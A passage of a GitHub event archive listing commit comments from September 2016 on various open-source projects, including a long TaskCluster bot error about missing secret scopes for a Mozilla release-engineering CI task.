{"id":"4608221917","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"ORNis/openMVG"},"payload":{"comment":{"id":19145345,"position":50,"line":228,"path":"src/software/SfM/main_ComputeFeatures.cpp","commit_id":"b975d01f269e38a05ec96ae765f3f0321584ec0f","created_at":"2016-09-23T12:19:58Z","updated_at":"2016-09-23T12:19:58Z","body":"Understand it. We perform a POC (Proof Of Concept) here"}},"created_at":"2016-09-23T12:19:58Z"}
{"id":"4608222876","type":"CommitCommentEvent","actor":{"login":"ORNis"},"repo":{"name":"ORNis/openMVG"},"payload":{"comment":{"id":19145347,"position":38,"line":218,"path":"src/software/SfM/main_ComputeFeatures.cpp","commit_id":"b975d01f269e38a05ec96ae765f3f0321584ec0f","created_at":"2016-09-23T12:20:11Z","updated_at":"2016-09-23T12:20:11Z","body":"ok"}},"created_at":"2016-09-23T12:20:11Z"}
{"id":"4608224099","type":"CommitCommentEvent","actor":{"login":"bpedersen2"},"repo":{"name":"javamelody/javamelody"},"payload":{"comment":{"id":19145350,"position":33,"line":434,"path":"javamelody-core/src/main/java/net/bull/javamelody/Collector.java","commit_id":"5029404eeb24e7b5c657453d06e9fc603fa5eb0d","created_at":"2016-09-23T12:20:27Z","updated_at":"2016-09-23T12:20:27Z","body":"This function is not supported on FreeBSD, see https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=205229"}},"created_at":"2016-09-23T12:20:27Z"}
{"id":"4608224270","type":"CommitCommentEvent","actor":{"login":"krishanthi90"},"repo":{"name":"asingh8c/Codewarriors_Asg3"},"payload":{"comment":{"id":19145351,"position":null,"line":null,"path":null,"commit_id":"286e934bfecfd3680463e9e380bc3556190f6fd1","created_at":"2016-09-23T12:20:29Z","updated_at":"2016-09-23T12:20:29Z","body":"write comments"}},"created_at":"2016-09-23T12:20:29Z"}
{"id":"4608231477","type":"CommitCommentEvent","actor":{"login":"spoonerWeb"},"repo":{"name":"ccpp/be_secure_pw"},"payload":{"comment":{"id":19145360,"position":null,"line":null,"path":null,"commit_id":"368bb2e605629817fbf0fe1c0e4c9f1b8905e123","created_at":"2016-09-23T12:22:11Z","updated_at":"2016-09-23T12:22:11Z","body":"Nice piece of code. I would love to merge it into the main repo.\r\nIs this also tested and working on 7.6 (and maybe 8)?"}},"created_at":"2016-09-23T12:22:11Z"}
{"id":"4608231628","type":"CommitCommentEvent","actor":{"login":"KirillMysnik"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":19145363,"position":null,"line":null,"path":null,"commit_id":"f4061002ab6088f3b01f98af5ac99526bf73cc4b","created_at":"2016-09-23T12:22:12Z","updated_at":"2016-09-23T12:22:12Z","body":"> I don't understand what you are trying to point out here.\r\n\r\nI mean, @invincibleqc took time to rename `OnMapEnd` to `OnLevelEnd` for consistency reasons, and since this new keyword also uses `OnLevelEnd` for implementation, shouldn't the keyword be called `cancel_on_level_end`, too?"}},"created_at":"2016-09-23T12:22:12Z"}
{"id":"4608239063","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19145375,"position":null,"line":null,"path":null,"commit_id":"7272223930c7cb67ea9d92d6c85b6752e7f62594","created_at":"2016-09-23T12:24:02Z","updated_at":"2016-09-23T12:24:02Z","body":"Yes, I've seen you use that method before. While it is a clever hack, I was worried that users would get confused by the formatting, so I opted for the simple HTML comments."}},"created_at":"2016-09-23T12:24:02Z"}
{"id":"4608240873","type":"CommitCommentEvent","actor":{"login":"stweil"},"repo":{"name":"UB-Mannheim/hocr-tools"},"payload":{"comment":{"id":19145378,"position":null,"line":null,"path":null,"commit_id":"a709b94c4fa120f19b47c4470a0646468ac17ba4","created_at":"2016-09-23T12:24:28Z","updated_at":"2016-09-23T12:24:28Z","body":"That was some kind of automatism triggered by the shebang - before I realized that `tsht` is a very special shell. Maybe it should be renamed to `kbash` :-)."}},"created_at":"2016-09-23T12:24:28Z"}
{"id":"4608247286","type":"CommitCommentEvent","actor":{"login":"ITASAPI"},"repo":{"name":"ITASAPI/ITAS-IServices"},"payload":{"comment":{"id":19145390,"position":null,"line":null,"path":null,"commit_id":"a54fcc7a89fc270fadbe55fa75a1f5df5a560281","created_at":"2016-09-23T12:25:58Z","updated_at":"2016-09-23T12:25:58Z","body":"__API Description file syntax error on line 346__: base type 'ServiveResponseDetail' is not defined in the document (Autogenerated message from apiary.io)"}},"created_at":"2016-09-23T12:25:58Z"}
{"id":"4608247652","type":"CommitCommentEvent","actor":{"login":"joelseverin"},"repo":{"name":"verath/owbot-bot"},"payload":{"comment":{"id":19145391,"position":null,"line":null,"path":null,"commit_id":"9687a3a26ce6ce5d516947fa8ba263fbb9574d73","created_at":"2016-09-23T12:26:04Z","updated_at":"2016-09-23T12:26:04Z","body":"What are you doing peter?!"}},"created_at":"2016-09-23T12:26:04Z"}
{"id":"4608249430","type":"CommitCommentEvent","actor":{"login":"satoon101"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":19145402,"position":null,"line":null,"path":null,"commit_id":"f4061002ab6088f3b01f98af5ac99526bf73cc4b","created_at":"2016-09-23T12:26:27Z","updated_at":"2016-09-23T12:26:27Z","body":"> shouldn't the keyword be called cancel_on_level_end, too?\r\n\r\nGood point, will update that now."}},"created_at":"2016-09-23T12:26:27Z"}
{"id":"4608250039","type":"CommitCommentEvent","actor":{"login":"ilcsik"},"repo":{"name":"unicef/etools"},"payload":{"comment":{"id":19145405,"position":5,"line":30,"path":"EquiTrack/workplan/models.py","commit_id":"e11e34cce94836816c188763d81c9c847bf5d594","created_at":"2016-09-23T12:26:36Z","updated_at":"2016-09-23T12:26:36Z","body":"@robertavram do we only have CountryProgramme on the Workplan model, or also ResultStructure?"}},"created_at":"2016-09-23T12:26:36Z"}
{"id":"4608258667","type":"CommitCommentEvent","actor":{"login":"kiwinet"},"repo":{"name":"kiwinet/gluon-my-packages"},"payload":{"comment":{"id":19145420,"position":20,"line":46,"path":"gluon-airtime/src/respondd.c","commit_id":"cdd116f6b7b329c82bf1dbaea9b0e4ec7742b20d","created_at":"2016-09-23T12:28:38Z","updated_at":"2016-09-23T12:28:38Z","body":"test"}},"created_at":"2016-09-23T12:28:38Z"}
{"id":"4608269099","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19145441,"position":14,"line":29,"path":"libselinux/src/procattr.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T12:30:56Z","updated_at":"2016-09-23T12:30:56Z","body":"No glibc wrapper for gettid, see the man page on Linux."}},"created_at":"2016-09-23T12:30:56Z"}
{"id":"4608273850","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":19145455,"position":null,"line":null,"path":null,"commit_id":"7c07cb791f0ba28c172a6892314e03493dae3391","created_at":"2016-09-23T12:32:01Z","updated_at":"2016-09-23T12:32:01Z","body":"@davidfestal I suppose we could now use this property, instead of the one you introduced in `ide-config`. wdyt?"}},"created_at":"2016-09-23T12:32:01Z"}
{"id":"4608290452","type":"CommitCommentEvent","actor":{"login":"jbarnoud"},"repo":{"name":"MDAnalysis/mdanalysis"},"payload":{"comment":{"id":19145496,"position":42,"line":101,"path":"package/MDAnalysis/topology/GROParser.py","commit_id":"1524f75248e30afcc9b3d8ff9d99555bffb9bf18","created_at":"2016-09-23T12:35:51Z","updated_at":"2016-09-23T12:35:51Z","body":"Should the guesser be called on a by parser basis? Shouldn't we call them in the base class to fill all the gaps in a uniform way?"}},"created_at":"2016-09-23T12:35:51Z"}
{"id":"4608291870","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19145498,"position":null,"line":null,"path":null,"commit_id":"e1709c4adee67189246467e7e2c02f9bba8b99fa","created_at":"2016-09-23T12:36:13Z","updated_at":"2016-09-23T12:36:13Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"Byr0T_y3SIqmJnX3pbHcTA\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"e1709c4adee67189246467e7e2c02f9bba8b99fa\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:36:13.586Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:36:13.586Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"ehR-C2bOT8C9yukWOo_eAA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:36:13.586Z\\\"\\n}\\n  time:     2016-09-23T12:36:13.705Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"Byr0T_y3SIqmJnX3pbHcTA\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_clobberer\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"e1709c4adee67189246467e7e2c02f9bba8b99fa\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:36:13.586Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:36:13.586Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"ehR-C2bOT8C9yukWOo_eAA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:36:13.586Z\\\"\\n}\\n  time:     2016-09-23T12:36:13.705Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"Byr0T_y3SIqmJnX3pbHcTA\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_clobberer\",\n                        \"description\": \"Test, build and deploy releng_clobberer\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_clobberer\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"e1709c4adee67189246467e7e2c02f9bba8b99fa\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T12:36:13.586Z\",\n                    \"deadline\": \"2016-09-24T12:36:13.586Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"ehR-C2bOT8C9yukWOo_eAA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T12:36:13.586Z\"\n                },\n                \"time\": \"2016-09-23T12:36:13.705Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"UBlZKxl6QGC-nez1IgHo8Q\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"e1709c4adee67189246467e7e2c02f9bba8b99fa\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T12:36:13.587Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T12:36:13.587Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"ehR-C2bOT8C9yukWOo_eAA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T12:36:13.587Z\\\"\\n}\\n  time:     2016-09-23T12:36:13.710Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"UBlZKxl6QGC-nez1IgHo8Q\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": 